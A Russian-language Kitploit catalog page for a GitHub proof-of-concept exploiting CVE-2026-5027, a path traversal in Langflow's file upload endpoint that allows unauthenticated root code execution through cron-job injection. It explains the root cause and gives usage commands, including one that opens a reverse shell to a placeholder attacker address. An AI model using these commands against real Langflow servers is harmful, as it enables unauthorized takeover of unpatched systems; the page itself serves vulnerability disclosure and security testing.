Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-5027 — Доказательство концепции эксплуатации для CVE-2026-5027, уязвимости обхода пути в Langflow, приводящей к неаутентифицированному удалённому выполнению кода через внедрение cron-задач. | Kitploit
Инструменты/GitHubGitHub/yahiahamza/cve-2026-5027
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubyahiahamza/cve-2026-5027

CVE-2026-5027

Доказательство концепции эксплуатации для CVE-2026-5027, уязвимости обхода пути в Langflow, приводящей к неаутентифицированному удалённому выполнению кода через внедрение cron-задач.

Репозиторий
424 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-5027 — Обход пути в Langflow с последующим удалённым выполнением кода

Описание

Версии Langflow до 1.8.4 включительно не санитизируют параметр filename в конечной точке POST /api/v2/files. Злоумышленник может использовать последовательности обхода пути (../) для записи файлов в произвольные места файловой системы. В сочетании с конфигурацией автоматического входа по умолчанию в Langflow эта уязвимость эксплуатируется без какой-либо аутентификации, что приводит к удалённому выполнению кода с правами root через внедрение cron-задач.

Затронутые версии

  • Уязвимые: Langflow <= 1.8.4
  • Исправлено: На момент написания патча не существует
  • Конфигурация по умолчанию: Автоматический вход включён (эксплуатация без аутентификации)
  • Уведомление: Tenable TRA-2026-26

Использование

root@kitploit:~
# Доказательство концепции (записывает тестовый файл в /tmp/)
python3 exploit.py -t http://target:7860

# С учётными данными (если автоматический вход отключён)
python3 exploit.py -t http://target:7860 -u admin -p password

# Обратная оболочка через cron-задачу
python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444

Пример вывода

CVE-2026-5027 Exploit

CVE-2026-5027 Reverse Shell

Первопричина

Функция upload_user_file() в src/backend/base/langflow/api/v2/files.py передаёт file.filename напрямую в службу хранения без санитизации. Метод LocalStorageService.save_file() формирует путь с помощью folder_path / file_name, что не предотвращает обход каталога.

Ссылки

  • Уведомление Tenable TRA-2026-26
  • Langflow GitHub
  • CVE-2026-5027: Обход пути в Langflow с последующим RCE — полный технический анализ

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей. Используйте его только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.

Автор

Yahia Hamza — https://yh.do

Скачать инструмент